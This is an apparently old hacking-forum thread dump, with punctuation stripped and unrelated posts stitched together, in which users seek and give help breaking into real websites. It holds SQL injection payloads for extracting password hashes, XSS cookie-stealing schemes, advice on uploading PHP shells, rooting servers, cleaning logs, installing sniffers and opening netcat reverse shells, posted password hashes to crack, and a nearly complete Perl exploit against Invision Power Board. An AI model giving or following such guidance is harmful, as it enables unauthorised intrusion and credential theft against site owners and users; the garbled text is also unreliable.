yea somebody likes sql and somebody dislikes it and about rfi right now it s ok will try to read some more stuff and learn more mby someone in irc will help me d btw i cannot connect to this site irc channel plugin missing and i cannot download it damn wantedt to talk with you guys anyway thankyou u all you are kind pp.
my pleasure it s steep but not everything is easy if you need help with anything feel free to ask.
yeah i saw that but i m confused which of thosse to execute in its all dat files i opened it up and its a php files but i dont really get which ones the main ph.
i read the darkmindz sql injection article but it gives me errors i am stuck.
how about wget command install backdoorrun local exploit depend on platform to gain root access.
i ve been doing sql injection on a website but am stuck with what to do by doing this com top story asp id convert int version i get microsoft ole db provider for odbc drivers error e microsoft odbc sql server driver sql server syntax error converting the nvarchar value microsoft sql server intel x may copyright c microsoft corporation workgroup edition on windows nt build service pack to a column of data type int top story asp line so i know that the site is vulnerable what can i do to extract the passwords or become the admin group or anything else for that matter.
so any intrested it will be fu.
i m guessing that you are using windows right then my suggestion is to install some virtualization software for example freeware and it will offer you possibility to run many other operating systems and software in your home pc try some linux distros install different windows versions next install apache php mysql and play with web applications forums cms blogs install metasploit and find out how useful it can be read cissp guides for example are excellent books hacking exposed emule or other p p share software to download e books pdf files i m using emule and i have literally thousands of good books about it sec of course plain old hardcover book is the best choice so depending on your finances buy something to your book shel.
use your brain yes i did i did exploit but here s the problem with this exploit i can do only some uname ls pwd etc command not really usely usely only if i want to know some programm version where i am the kernel etc but i can do anything with that and if the server is on safe mode in french we said dtc dans ton cul as in your ass so ok actually on the compromise system i am only a simple user who can t change repertory what can i do are they some good things to do i don t want to break anything i don t want to make it a deface it s not interesting i d like to know how to get a root acces for exemple.
what type of attack if its syn flooding with a bit of luck he will get tired of it if not there are some firewall rules that can just stop it all together but ill have to ask my linux mate ill get back to you on it syn flooding is a bitch but also effectiv.
need more visit this site my friend.
please any can help me to hack this site when i put union select the site show me not acceptabl.
hi all its a long time back i discovered waraxe us and i found it usefull from that day onwards well now i am back and just discoved an exploit for vbulletin my forum version which i am running i have wampsever intalled on my machine and i would like to test this one on localhost to test whether my forum is exploitable using this one or not i know how to compile perl coded exploits but i think this one is not written in perl so i need help to compile this oneany help will be appriciated as i am aware if someone else discovered it and used against my live forum then i must be founding my self in troublethe exploit is given below.
ok i upload this php to this server what i need to do please hel.
if you know username for example admin then username admin password n aif no username is known then username or limit password n.
here is post from text avaliable at please check out the links to they contain many ways xss can be a problem.
if you re trying to execute commands through sql injection remember you won t get any output from that dir c command and i suggest you not to do that manually but using something such as msf mssql cmd module or sql ninja which i prefer.
the headers sent by this exploit script are not rfc compliant and confuse virtualhosts that is why the lwp versions work lwp builds the headers for you and this one does not.
this can be m access which is without union support or try to use numbers not nulls union all select and look for further error messages and maybe there is need for commenting out union all select or union all select etc etcyou are lucky because you have error feedback so try to figure out what s happening insid.
try using thi.
vulnerable forum versions so otherwise it would be least thats how i read it i have spent a good bit of time working on this sploit and its just flawed i lack the skills needed to fix it still wishing somone will fix this bad boy and share it tho.
unless your browser has scripting disabled you should be returned to the page you were at in a couple seconds otherwise please click here to return manually.
socialmpn remote file inclusion discovered by zer c l irc brasnet org at nmap or email lucaszero at gmail dot com versions of socialmpn affected all versions socialmpn oficial site socialmpn com its vulnerable too ps a lot of sites maybe all sites has safemode in php real life exploit evil file file article sid.
windows x.
e g wayback qemmvo bg s wwhen i got that file i thought it was pwl file cause it looks like the ones on unix server hacking tutorials but when i tried to decrypt it using cain it wont work what kind of encryption is it and yeah i was also having some read access to some emails and they were encrypted in some sort like one email is something like this that a pgp or something i saw it when i was trying to view neomail in the server remotely is there any way that can be decrypted.
it s basically double sha.
ok injector i think it s a password file but to now in what system is encrypted and for what is that password you have to say the name of the file is it s a linux password you should try to use john the ripper this soft detects automaticaly whats encryption system useshope i could hel.
is this what you need c cae fc bdc f b fed cb b bd c cc b bfc c f d d a b c eda b b ded eb bf efef ce cd ca eed db ca fdcf c d d df b d dd fe f ab b dae d d cd b a b f d bf c d e a cdc c e f b feed ff ae d f c c ea be a d e a d aa ea a f ebb ac d ad d adf d d b f b c b e f eaa c daa afa ceb eba bf b b d bdc c aab c c cdb cb f fe e dd bcc cecb aa c fb c b dc c eb a cc d c b a d c ee e c bd f deb d a fd cc ddcd ce bf b a be bb c ee d f bd d e cb b d ef f e deece eacc f ef c f a cd a dc think it was from pbpbb version i think.
good info madma.
thank you waraxe much clearer on that part now one more question how can i try out xss you know to get the right feeling and study on from there i mean do i just install some older forum packages on my localhost but not all web pages are built like forum.
what operating system you are using gcc is usually available by default in nix boxes.
ok so it would seem my initial question was one of those stupid questions if anyone would pm me i could tell them about my site and the offending site perhaps one of you guys would then do some deeper investigations for me.
don t post sensitive information real url s hereas for error it s probably coming from waf such as mod security it is year already and various web attack methods have been used by blackhats for many years waf s web application firewalls are whitehat s answer to this and they are going to be more and more serious obstacle nowaday.
so basically what i need is that the victimsite com allows javascript and html so that it would save the victimsite com cookie and when he gets to my page it would be saved and i could look at it from the logfile did i get it righ.
paid hosting not sure where though and its ip board any tools or tips would be sweet thoug.
suteki send me url in pm.
a sql file with lots of usernames md s etc i am looking for a way to remove the md s and organize them into a list any ideas.
wow thanx manmy brain has been exploed lol this time really i will not change the channel zill.
yeah i saw that already i posted i dont see how that can work though.
i downloaded it but it doesn t seem to be an application in osx just an addition to console i tried opening the script with console but it didn t execute.
i was wondering if there is a vbulletin exploit or phpbb that gets the hash and salt it has to be a perl script i cant get php to compile even with my own apache server and php installed i do have my own exploit that get just the hash but returns no salt therefore it is useless any ideas links.
after reading thisis there anyway to upload the c shell file to a server.
have u got the whole sql dump or just this piece if u have the whole thing then msg m.
rooting is recommended of course this gives you opportunity to clean logs install sniffer and do other interesting and valuable things just look for local root exploits for that specific kernel version now if there is restrictive firewall and or nat so that normal shell is not working then try to use reverse shell.
linux where are u.
good now try to locate phpmyadmin log in to cpanel and look for phpmyadmin link click it next you will need username and password which you allready have if you will get inside phpmyadmin be very careful one careless click can destroy entire databas.
some idea to think code is delete by m.
it works f c d c c d f d b f a final hash f cd ccd fdbf.
grea.
hi i have a problem i have finding this bug username apassword n ai find this error sql message.
right last questionhow can i change permissions on a folder using c shell thanks all edit im reffering to directories such as home usr cpanel.
plz help this the error appears when i try to access the php shellparse ini file safe mode restriction in effect the script whose uid is is not allowed to access home t public html owned by uid waiting.
you have access to target s ftp can you upload arbitrary php scripts can you download files from target webroot then download config file get mysql credentials write simple mysql dumping script and fetch user table with all the pasword hashes and salts and how about phpmyadmin is it present if so then obtain mysql credentials and then use phpmyadmin.
works and i see google s page see r txt php code on the page but the server does not parse it as php why.
not sure i m just wondering how i can use this.
there can be many reasons to exploit failure like patched version ofthe xmb forum and body onload will not work on all browsers so first step is to look at html source at the html page where youtrigger exploit look at code near the critical point and see is there html code with right syntax or you must modify exploit to be working by the way your code can be more simple.
i got this warning main unable to access bands select username password from users php in home virtual site fst var html letter php on line warning main bands select username password from users php failed to open stream no such file or directory in home virtual site fst var html letter php on line warning main failed opening bands select username password from users php for inclusion include path php includes usr share php in home virtual site fst var html letter php on line is this full path disclosure how does this help me.
i didn t now anything about sql hacker use a way like targethack com bug bug injectsomebody can answ my question how can we seach the bugs for php vb php nuke or etc why bug usually like a syntax but in sql injection we just looking a bug like targethack com bug bug inject why sql inject is like another web linksorry for my bad englis.
this can be evaded by union and nuke authors and sql injection can be done through post or cookie array so this security trap only helps against the simplest of attacks.
how is it going because is this php useful for working hash truth i am interested in getting the list from e mails would you help me there saludo.
nice but this sites are not so big look at this playahead com online every time writen in asp try there sql injection i think have many.
it does not seem to be lfi or rfi but can be local file disclosure in this case you probably can read local files and that s useful featur.
helloi found a site which is vulnerable for sql injection with a version query i found out that it runs mysql v with site com id and substring version what can i do now to inject sql since i read that union and subselect queries won t work with v.
there are xss filters in phpnuke against get requests if no measures are used fortress etc then by usin.
mainly xss cross site scripting just consists of basic java html interpreted commands to do malicious stuff take for example can use this to gather the session id from the site your currently at by pulling these commands.
okay so i want to steal some cookies from an xmb forum i ve written a php script.
i cant do iti see just this tag.
well i will look aspnuke soon this is what i got within first seconds.
split this wordlist to small lists and try again.
try to put full path to the wordlist something like d blabla wordlist wordlist tx.
in case of mysql x it all depend of the table s which are accessed with affected sql query as there is no union and subselects then you are not able to access other tables so if you are lucky and sql injection occurs in query which deals with users table login password restore etc scripts then you have access to user credentials but if for example you have sql injection in news script which deals with news table then it is obviously not useful of course you can fetch some data database user etc into outfile load file may be extremely useful too if you have file privilege not common in real world situations conclusion mysql x suck.
hey you could use and attach a free domain from them to your hos.
the url on this website that requires login looks like this site com index asp lg is there any way to exploit this when i put magic quotes like this site com index asp lg it returns microsoft ole db provider for odbc drivers error oracle odbc ora ora quoted string not properly terminated index asp line.
hello my friendshow are u i want to ask a little question about oracle injection when i want to retrieve the table name from all tab columns and specify the column name by this injection query.
xss shell.
i knew it i am on a bit windows so it didn t want to install the software i needed thank you.
hello waraxecan you please explain what you mean by this.
hi all i try this index php module formexpress func display form form id and there is a sql injection so i try with union select concat pn unamechar pn pass from nuke users where uid and other but it doesn t work any idea thank.
yes first thing to do is to remove unneeded info and let only user data i can write needed php script within minutes but i need source can you use php scripts on you pc and if you dont have privacy concerns then upload packed file somewhere and gimme da link and i will write script for md extracting tomorrow becaue right now there is am where i liv.
hi all im kind of noob to file inclusion i ve found a script to execute commands but it doesnt work for me can anyone give a php script to use in remote file inclusion and execute remote commands here s the code i foun.
this is oracle not mysql and you don t need single quotes here.
this is not php this c it connects to the host sends head s in a loop to determine any backups of vbulletin any questions.
try renaming r txt to r ph.
i have been in kosovo and that country is like outlaw texas they barely have internet and school and this kid says private school for programing lolnice try kid kid sorry for the offtopic but i must repl.
hey i found quite a few phpbb exploits i m trying to get the hash off of this site but the exploits i ve tried wont work the site uses ms sql and iis phpbb the forums are highly modified but the database is still intact these are the ones i ve tried from phpbb users where user level limit second requires mysql i have no idea what exploit to use can someone help i don t have the resources and time to set up perl so perl exploits wont work for me any help is there an exploit for mssql to remotely backup this sites database on my computer if anyone wants to have a crack for me pm me and i ll give you the site details.
of all the xss papers out there you decide to link mine thanks i guess but this paper is very outdated it was written in i think when xss was very new xss came out in i believe if cert is accurate on that but the idea of using string fromcharcode still works very good for evading filters in web apps although it should be noted that you dont have to call it for each character like i did back then you can issue just one call to the function for multiple characters btw wareaxe have you read anything on disclosure policies or on nondisclosure perhaps this will interest you it is a great movement which got alot of hackers to quit posting to bugtraq it will make you think about why you are disclosing what are your motives.
greetingvia sqlinjection i looking to write a backdoor into file but without quotesi have teste.
i think u need to read something about permission maybe about chmod also chown if u asking why you got that messag.
badro u salamyou wrote this assalamou alaykoummerci beacoup monsieur le directeur a me fait plaisir dans d autres forums on m aurait envoy balader si j avais fais cette demande thanx j ai une question tout de m me cela prendra t il longtemps avant que ce site n apparaisse sous google quand je fait la recherche badrh ou alors pouvez vous faire quelquechose contre a monsieur le directeur merci apparemment tu laisses beaucoup de traces higgs b s n d tre un peu intelligent et trouve un autre moyen nassiha lillah sala.
you can have php script foobar php which is containing code header content type image jpeg n n now you can go to and you see picture because browser sees it as picture you can even use htaccess mod rewrite tricks on apache.
i know how goes by tool but i prefer to learn how is goes manue.
thank you waraxe for your repl.
sorry for the retarded question but could someone point me in the right direction of the tools i will need to hack ipb forums also some tutorials would nice thanks in advance hope somebody can be a hel.
u dont need to compile pl files its like batch just install activeperl google.
thank you very much x.
here the bible very complet.
i used the cookie with live http headers and i got logged in as admin but i clicked on admin panel and it asked for the password and now my cookie is invalid and i cannot log in anymore so i need to find out the password.
its a horribly documented exploit i can t make anything out of i.
could the stalker have physical access to the machine if you really get worried you could ask for a data center transfer that would probably cost a bit though but certainly not grand.
ok thank yo.
hi there i recently attempted an sql injection using the following exploit i can t get it to seem to work properly i tried using different sql functions but i always get the error message no input file specified the exploit does say that you need to input the link to a shell file or something but i m not entirely sure what that means anyone more experienced able to give me advice.
no i want to scan all that domain and find all the folders inside and secret folders too i ve done scan for my website but it hadn t found anything don t know why but he must to find cuase there s really one folder and really one file of html and he finds only one javascript so maybe you can help me.
ok here is php cli script i wrote today.
please reupload link not wor.
koko that s the exploit i have been using and if you had actually read what waraxe said he was saying that we should download ipb v forum and install on our computer but i said i cannot find it and he should give me the link do you know where the link is.
same problem i get too apparently v final is not available for download any longer if it is could you please find the link for me waraxe.
is there anyone know about something about vbulettin xss if someone helps us we will b very please.
i tried but neva worked i got this and the version of the board is i need to know what the forum folder is o thanks for yourhelp by the wa.
i have the same result nobody has information.
i appreciate the notification i recevied back in march about our system s regarding remote file inclusion however i request some help in finding a new remote file inclusion problem that has been brought to my attention i have been told that i have days to resolve this bug not sure sure what will happen in days but i am expecting an exploit and i thought i had resolved this issue back in march completely but apperently not any help in finding what problem is there would be very helpful i can work with whomever wants to help to make our system more secure thank you again for your time.
nice job have you post a confirmation to the vendor.
do what he said and false output and true output if this works then you have a sql injection.
im too lazy to write an entire tutorial for it you can just google that but bassicly there are two parts to it there is the part you put in a site via an xss hole and then theres the part that you have a server of your own after you set both you wait on your server until victims go onto the xss on the other site and you can send various commands to them and i havn t looked in to it but it does say you can bypass ip restriction.
i have some usernames and passwords to a website which i know work the problem is that the admin has now made it so that each user can only log in when using their own ip numbers is there anyway that i can bypass this.
waraxe i don t try your script but look nice install phpmyadmin on your pc import this dump in some db after that simple sql query exampleselect concat username password from usersselect concat username password salt from user.
here ya godownload edited to work with new mysql i don t know why there are all s i have the same problem then on some forums that are v final i actually get a hash maybe the ones that you just get all s are patche.
seems to be complicated case you can try to search other sql injections in same website use subselects and blind injection so that instead o.
well the only script that managed to log the cookie is based upon thismy cookie user zeno id my script cgisecurity com cgi bin cookie cgiit sends a request to my site that looks like this get cgi bin cookie cgi user zeno id note is a hex encoding for a spacebut the source of cookie cgi is not given.
you wrote before.
this logger code seems to be ok maybe you don t have write permissions to specific directory so i suggest to add some debug code.
ok this seems to be complicated case try benchmark and watch for response delay if this will work then use blind sql injection attack example.
try this.
it seems to be exploitable but there can be lot s of mitigating factors you must follow traditional sql injection exploiting scenario get syntax right and then try to pull out some information and as you have useful visual error feedback then it should not be very difficult.
yes my suggestion is to install some old forum blogging or cms software on your own local pc and then try xss in practice and believe me most of the real world websites are affected by xss there is no difference between forum based or cms based or any other website from xss exploiter s point of view target can be custom written website and as long as there is some kind of session management xss may offer possibilities to hijack sessions and impersonate users or admins in case of weak session management security no remote ip address and or useragent binding etc.
sori i can t undrestand i use this expolit.
i funny think i like to use at school is the netsent command build some loop it is just for bothering but yeah nice way of communication during classtest.
how big is your sql dump file megabytes.
magic quotes sim salabim or abracadabra hehehe just kidding icenix magic quotes is a flag or trigger to treat external data requests file contents database fetching by automatically escaping special characters mostly single or double quotes if assigned to string variable in php magic quotes is adjusted from php configuration file php ini in scripting code php provides three magic quotes functions get magic quotes gpc get magic quotes runtime and set magic quotes runtime get magic quotes gpc function will return setting in php ini this is used to control automatic character s escaping from requests this code will show you how the function works.
hello to alli have an archive named c server pack full all rarit haves megas and i can browse the archive but it s lockedwhen i m trying to extract the files it s ask me for passwordi ve tryed with arpr brute forcingmasking and dictionary attack and nothingwhat can i do to break the password ere is the link of the rar archive locked if you can break it or extract the files make the archive again and post an link or something here or the pass if you find itdwl from here archive contains the c server of lineagei ve tryed brute forcing and dictionary full english of and russian dictionary the archive normaly was putted by an russian guy if that can help the archive is containg the server c of the game lineagei m trying to crack the crack the password but nothing i have days maybe someone knows the password or have an link to download the archive without the password thanks to all in advantag.
how to explore this bug.
i consider that you can use the admin name of target websitelike thi.
i just checked out ip address of the loading and he is from ex yugoslavia indeed.
iam hacked site its version is and iam guess so much but icant know any one know way to know the name of tables and columne.
years old school needed you to be a cracker well nvm you can crack using mdcrack ng brief idea here google to find mdcrack ng if you want to download.
yup its getting harder and harde.
i installed it on a laptop but i now saw that the version is very old so can somebody tell me a php interpreter for cmd that works on forum that has.
nevermind i got it i loaded php script via the stylesheet.
thanks dude it worked nvm about that passcracking i got it and im gonna change it to ill see about the upload gam.
i find it funny how this is newbies corner yet none of the questions answers seem to answer my basic question of the first step in this elaborate process how would i get the password password hash i don t have ftp access to the server and my privileges are that of a normal user there s got to be some way that i can do this remotely without having to jack the site ftp or something i don t mind researching a bit i just need some pointers in the right direction so far all of the knowledge base i ve found has pertained to what to do with the password and methods of cracking the md hash so i m a little lost on what to search for phishing is a possibility though i d rather not have to resort to that since it s chance of working is minimal due to the targets being likely more proficient in computing than i am.
ok a uname ra gave me that.
if your trying to crack the pass it going to be here in the red colorinsert into user values admin df e e d bef wb ed after you export the user table or however u decided to get the data from i.
just another thing i did at school some days ago is catch the pc somebody else works on is logged in and runs some application to do so you either need physical access or at least remote desktop connection then you make a screenshot with the application running in front afterwards close all applications and use your screenshot as desktop background do not forget to move all desktop icons to trash now you are finished go back to your place and keep watching it is very funny we had some students in class who are no that familiar with computers they tried to reboot and everything and nothing worked for sure you should not do this to your friends or anybody who is familiar with computers but you know there are some guys at each school who always say they are the best they catch your girls and so on you know it s funny to see those guys messing around with a issue like this especially because the issue returns if you reboot to get it a bit more realistic just place some it s your choice how many you like error messages on the desktop background the user is going to try to close those messages but can not because they are just part of the picture as i told you before it is funny to watch people bothering with this issue and it can be done very easily regrades snoop just some fun i want to shar.
hello what i have to do here proof of concept examples how i can get the cookie i cant understand the way of using this i have more quiestions code here code here here xss code here what the hell is this code this is sql inj what code in the edit save post bug there is no section with picture editing i dont know how is the code if i wont to load and a picture from link img address img no effec.
that s a perl language fil.
is there really a way of bypassing safemode local exploits probably can anyone please show me the path i have a shell backdoor running but i can only access folder.
im using the code that you provided koko and i keep getting the same error over and over can t use an undefined value as a symbol reference on line any suggestions.
they are many i will add them from time to time so stay tune.
or use plugin liveheaders in mozilla to send cookie file log etcgreat find waraxe thanks.
then i don t see easy way to interact with operating system unless you find administration backend or other attack vecors like vulnerable upload scripts etc.
stmicrosoft ole db provider for odbc drivers error e microsoft odbc sql server driver sql server ad hoc access to ole db provider msdasql has been denied you must access this provider through a linked server ndmicrosoft ole db provider for sql server error e sql server blocked access to statement openrowset opendatasource of component ad hoc distributed queries because this component is turned off as part of the security configuration for this server a system administrator can enable the use of ad hoc distributed queries by using sp configure for more information about enabling ad hoc distributed queries see surface area configuration in sql server books online with tools like priamos i am able to browse through their whole database get tables and columns just the data is rejected.
in order to jump to operating system and for other cool stuff you need sa privileges in database try this.
like waraxe said yep thats the thing goes workeasy way is mitm just fake one of the certificate n hope the user wont notice of them just ignore the error warningeasy way use cain n abel.
dos in itself is just a spastic hack anyone could do it and thats just what pisses me off if i could change thing about the way dos or anything else works it would be a for all source codes c and perl break up the script so people cant use itb never get anyone to compile a dos tool into an exe so some loser can use it im sure that would greatly reduce the ammount of people who do these thing.
what s error based feedbac.
there is one more issue if you use a firewall and or ids to detect dos flood packets and have them automatically banning source ip addresses think about what happens when attackers spoof millions of ip addresses and after that nobody can connect to your server this scenario is discussed on various firewall manuals and there is no simple solution.
sorry but i fail to see any rfi lfi of file disclosure here it may be xss at best.
well are you sure the page is vulnerable to rfi index php may have a set of filters to strip out the of or in fact any url altogether their host may also be set up to disable url based includes which is quite common i believe that url based includes are off in php ini by default those could be your two main problems with your attack currentlyif you do manage to get an include be sure to upload a shell just keep it simple don t leave files on their server that are unnecessary or you will arouse their suspicions my usual approach strictly lab based attacks and for pen testing is to start a netcat instance on their server forwarding to bash essentially it allows me shell access in a more convinent environment than through a php script from your makeshift ssh server you can get to work looking at other expoits for example in the kernel be sure to cover your tracksi suppose all that is pretty confusing so ask away your questions im here all wee.
what status you have right now can you log in as cutenews admin can you see template edit option in admin menu.
scan target webserver for tcp port if it s open then it may be possible to connect remotely to mysql daemon search for phpmyadmin interface on target server and use credentials you have find a way to get php remote code execution level on target server and then connect to mysql through php functionality look for other webites on the same webserver think about virtual hosting find weakest link one option is to buy hosting for one month to target webserver and then try to use it for database and file system access in this case all depends on hosting server admins how good are they at cross user security management.
sup i have a few things i would like to ask i been exploiting for alittle while now but all i can do is use the search and journal and the search doesnt work i need something that will get me in nomatter what so if there is any exploits out that could help me could you let me kno.
helloi am all new to this sql injection and exploits for forums would someone be able to point me in the direction of how to do it that would be very helpful and i would be very greatful regardz not.
is there any to smf that are proven to work been thru the forum all day can really find anything thanks in advance.
thx it is working no.
another link.
try to find phpmyadmin or some other sql client on this server.
i would imagine it would still work like if it was your server.
sup alck this isnt a bug but a attack type that pretends that a user that dun know bout click on the link after he loggon a site etc like a forum so u make a post and put a link etc lemme show a example i aint no good php lets try some asp pages hehe your target forum com your page that will get the cookie myweb com cookie asp you make a post on that have a url like this click here to check my new website so if the user click on crafted link they will be redirected for your page wich will do the follow get cookie and store it on a table redirect the user for the correct link so don look suspicious cookie asp connect to the db creates a recordset etc dim trim request cookievalue insert into the db with rcookievalue location href rightpage asp got it.
you can ask linux for that or u can drive trough to rfi section linux already paste the link too the scrip.
liunx where are you this shell is not bypassing the save mode at all more explanations needed perhap.
kapersky antivirus detects like virus pump to it of archiveszone alarm whit antivirus it does not detect itforum member test decompress everythin.
i ve found it in id xss when i try alert document cookie everything works fine but when i try alert hello then in source code are replaced by and then nothing is working like it should so is there a way how to avoid this and another question is it available to inject php script.
how many days needed too get one replay in this forum seems to long but still the hope covering all my topic.
maybe target is patched you know whats s your best option get needed ipb version from somewhere and install in your home pc and then try exploit s locally and after you have been successful in hacking your own website s then try remote targets in real world this can save you from lot s of frustratio.
thats not what you need to do at all take a look at a similar exploit for ipb and phpbb using bbcode but i did find this on a vbulliten support site.
yes i know men that is not a spyware or virus but is a generc mesage if for that was i write the poc for this situation and write to google for asking what are they make whith this searches i publish python script for two reasons i think this is a exploitable situation for google looks the potential use of this news filters.
mostly for the purpose of education though i would like to crack one pass so i have passwordspro access to the ftp and cpanel and i would like access to the admin s account mostly the admincp i ve tried searching but i m afraid i don t know much about this stuff so say i have a site example net which is a vbull site what would i do step by step so far i went to example net admincp php and clicked on view page source i searched and found this.
this specific issue does not seem to be sql injection but to be sure try every parameter with and without use of single.
how many databases have on this mysql server.
when i got inside a site i saw file like shadow and pwd file like injector asdaseaewa does that mean that that is the password and if so can it be decrypted or unhashed i tried decrypting it using cain but it doesnt seem to recognise it cain only decrypts pwl and md.
well its snitz forums and there exists xss in links showsub asp cat id cat basicly i inject folowing script document location script php is instead of having cookie logged in a logger txt the cookie is displayed in the address bar this is the reslut why is not cookie logged in a logger txt fil.
new sql injection found in vbulletin forums xthe vulnerabilite found in last php last topics hack last php fsel user password as titleuser username as lastposter from user thread where usergroupid limit enjo.
ok what version of the ipb software is the target running where is it being hosted if its not self hosted.
search for scripts installed on the webdownload.
try with char ascii id union all select column name from information schema columns where table name concat char char char char char char char char and table schema concat char char char char limit.
index php action detail id union all select password from mysql user where user user causes syntax error you have an error in your sql syntax why butindex php action detail id union all select concat user x apassword from mysql user workshow i can find passwords for other users other than root.
you don t have file priv.
hi maybe can you see like this one users in your error sql it s magic quotes problem for bypass it you must encoding ur user to hex or char.
try appending some of these to the end of the string to the parameter that you are messing with.
forgot to mention the responce cookie is on following formatcookie snitz c c c c snitz user pword md hash name userid.
hi yes that would be excellent if anyone could help out here below are some of the ones i am unable to crack waraxe i will pm you the name of the site that they refer to fe d da c ecda d f eout zero c e e a e e c ff c bodie b e e c b d c f e amyke edc a d fbd b b bc dba f k memory a ea fbddae d bea a p wry bf d d a af c dcdbcfdsear e e d f e c fca ljs f ee e f bb c fmc c adb e da a ff ae ef ea jenga cd cf d d cb b fsmeg f ffde c cf a d e c btubbylad bd bc d f f d these are the usernames of the mods and admins on the site.
hi allhere is the link to the teaser of hakin magazine and this is the speacial issue connected with the sql injection you are interested to download it you have to register on free account.
smf thanks for the reply description rgod has discovered a weakness in simple machine forum which can be exploited by malicious people to disclose certain system information the weakness is caused to the application allowing users to use external files as avatars this can be exploited to gather information e g ip addresses browser types of other users who view a forum post containing an external avatar image successful exploitation requires that the user is allowed to specify external files as avatar the weakness has been confirmed in version other versions may also be affected solution configure the user group permissions to disallow the use of external avatars what would i use to do this a script file another n b.
i hear its possible to browse directorys what are hidden or protected eg when i go to a link i get forbiddenyou don t have permission to access on this server additionally a not found error was encountered while trying to use an errordocument to handle the request i just wondering of its possible to bypass this or anything that can do it thanks to those who understan.
no my question is do i had permissions to read some files like config php that s all o.
is there any known smf.
please don t post real url s next timeload file and other file related functions in mysql require file privileges if website is hosted on shared server then probably admin will not give such privileges to low level users same story is with mysql user if server is secure then you can t access mysql user access denied so instead of escalating sql injection to php code level through into outfile or reading files with load file you can try to find administrative interface then fetch admin username and password from database and then try from web application admin interface escalate your privileges example template editing can give you arbitrary php code execution possibilities various website settings sendmail path can give access to shell command exec other pathes local file inclusion valid uploadable file extensions you can change them and upload php files etc possibilities are endless be creativ.
well most of these computers are windows xp otherwise i cant find a version type but latley iv been trying to figure out how to shut down other computer with ms dos and all the computer are on a network and i know theres a way i just need some help.
it would appear that is not vulnerable just yet give it a few months i suggest and look again an exploit may crop up then apart from that you could do two things look for other software on the same account that might be vulnerable eg a blog or even vulnerable forum modifications eg a shout box look for insecure or vulnerable apps on neighbor accounts assuming that it is shared hosting and try to get into the server from there try this link enter your target domain and carefully look through the results for outdated websites.
as soon as possible ive made an simple script for testing the site i post it to bugtraq to.
sup guys i need sum to hack this siteu can even access the cp on tht site u just need the pass so crack it im nooby at hacking so ya need sum help or you can do it ps u can access the admin panel with out being admin so think bout it o oif u want to hack it with me pm to meor if u want to help reply please thank.
is strip tags of php for input dn is good enough againts xss and nl br for out put so simple texts may bebut is not it more secure also if site is using htmlentities or for output of the data from db still am i have a change to bybass them.
hi guys almost all of php nuke atacks try to get nuke authors information and i think that writte this code in mainfile php is nice.
when i d.
ok thanks yes that works for some of the passwords i take it that where it doesnt work is when a user has used a more secure password string i e not a standard word am i correct unfortunately it doesnt work for the guys whos passwords i wanted like the admin of the site what can and should i try next to get access to their site or the admin passwords they have now.
i love thisth.
drop it until you know the basics i d say google ftp client sql injection php apache.
care to share with me on what you use then please.
if you can t use sql injection for login bypass then use it for blind sql injection attack and get all the info you need there are tools for this it s not that difficul.
yea u can use.
or lfi more common probably your best bet as i and lenny said rfi in php is no longer so common there s a setting in php ini called allow url fopen that s commonly set to off and also if the code it s likeinclude somethinghere get page you can t overwrite the somethinghere part so you can t call external http files in such a case very common.
hi guys i d like to ask something maybe someone can help me yea its about mime types can they be faked i mean is it possible that i have a php file that i upload and somehow tell the browser that the mime type is jpeg it would be a pretty neat trick to fool some server side scripts any ideas suggestions thank.
hey everyone ok so i ve got host user passfrom mysql userthe pass has been cracked thanks to a great member here now upon attempting to connect to the mysql server using navicat i am displayed with the following error.
who has some ideia to make sql here injection here already i tried all things and the maximum that obtained was an overflow microsoft vbscript runtime error a d type mismatch string union all selec shownews asp line is an table name edited by linux read the rule.
i report all holes and vendor fix all bug.
look all sources codes and compare you need patienc.
ok here s the setup i can insert table names and so on but these queries are pretty hostile from what i can tell to sql injection there is no escaping at all so i can put in whatever i want if any queries fail no error is returned at all the only output are the queries themselves this script is meant to be accessed via ajax that is the user is not meant to see the output the programmer has forgotten to turn off his her debug output and also has forgotten to validate inputserver is mysql running on the mysql php extension here s the queries exactly as they are output by the script.
errm my file is saved as ipb pl in the bin directorythe exploit is usr bin perl invision power board sql injection exploit by rst ghc vulnerable forum versions tested on version final and version work on all mysql versions work with magic quotes on use for bypass magic quotes gpc on c oded by dt w lf screen r ipb pl blah com ipb server blah com path ipb member id target ipb searching password done member id password f dcc b aa d d deb cf r ipb pl blah com ipb server blah com path ipb member id target ipb searching password done member id member login key f c ff dfe c f d greets james bercegay of the gulftech security research team credits rst ghc use io socket if argv usage server argv path argv member id argv target argv pass target member login key password server s request request server request path s num n print server server r n print path path r n print member id member id r n print target target print target ipb ipb print r n print searching password cmember id member id s uc sprintf x ord eg while if found found char i if char if length allchar print qq b b done member id member id print target member login key password print allchar r n else print b b failed exit else allchar chr s num sub found my fmin my fmax if fmax fmin i crack fmin fmax return i r int fmax fmax fmin check between r and fmax if check check found r fmax else found fmin r sub crack my cmin my cmax i cmin while i cmax crcheck i if check crcheck return i i i return i sub check n status ccheck pass hash f d pass hash e e pass hash pass s num ccheck pass hash s uc sprintf x ord eg nmalykh ec e eb fb f d ef e e e f e f socket io socket inet new proto tcp peeraddr server peerport printf socket get sindex php act login code autologin s naccept ncookie member id s pass hash s s s s s nconnection close n n path server cmember id pass hash cmember id pass hash pass hash nmalykh while socket if set cookie session id return return sub status status n if status print b b if status print b b if status print b b if status print b b sub usage print q invision power board v sql injection exploit usage r ipb pl server folder member id target server host where ipb installed folder folder where ipb installed member id user id for brute targets ipb ipb prior to e g r ipb pl ipb c oded by dt w lf rst ghc exit i wanna know what to type in to get the hashes off the st registered user of a forum can we use hackthissite com forum as an example pleasehelp is greatly appreciated and im new.
i guess that server throws error instead of showing meaningful sql error messages right now do you have allready working sql injection pattern if you do.
hello i found a site where i can inject from a form html js i tried php code but as it seems it s not processed it just appears as html i know that my code is stored in a db and then fetched and executed maybe i need to bypass the echo command any help suggestions thank you.
not only cookie stealing for xss only need imagination and look so many caracters can insert in the form or in the variable whats permit variables only acept html injection other html javascript injection if the atacker look for good work no go to make phishing on the site if you think for example in html you can inser a iframe and execute all the conten injected inside for exaple no explain what source of iframe can be a xploit a php file a js etc and can comming form a the same server or a remote server if the configuration permits xss is not only for looking whats change in the web is a big securiti hole and whith imagination and science you can got some important information about the site you can spoff the site and go for exaple to google and add this spoffed links.
i try but nothing i leave my computer whole day and nothing i used mdcrack ng can someone try.
after searching and reading and like this stuffi found that i can excute this expliot by netcatex nc n v then i have to enter some post commandafter that i ll get the md hash password okay now we are near and i need help also.
